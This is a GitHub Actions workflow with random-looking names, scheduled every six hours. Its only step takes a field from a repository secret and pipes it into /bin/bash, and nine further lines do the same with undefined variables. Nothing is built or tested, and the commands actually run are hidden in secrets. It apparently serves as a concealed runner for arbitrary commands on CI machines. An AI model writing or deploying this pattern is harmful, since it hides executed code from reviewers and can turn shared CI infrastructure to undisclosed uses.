name: tchuanj

on:
  workflow_dispatch:
  schedule:
    - cron: '17 2/6 * * *'
jobs:  # 9416
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tchuanj
        env:
          f5: ${{ secrets.f5 }}
        run: |
          echo $f5 | jq -r .cswwv04 | /bin/bash
          echo $slem2955 | jq -r .cicz27483 | /bin/bash
          echo $yw730 | jq -r .ddc9 | /bin/bash
          echo $xyckm2 | jq -r .d76255 | /bin/bash
          echo $ik1 | jq -r .ga34671 | /bin/bash
          echo $r1 | jq -r .yftl00435 | /bin/bash
          echo $sz703 | jq -r .z3091 | /bin/bash
          echo $rgo722 | jq -r .azcal28845 | /bin/bash
          echo $cac46013 | jq -r .fowv57417 | /bin/bash
          echo $lewd502 | jq -r .bq4 | /bin/bash

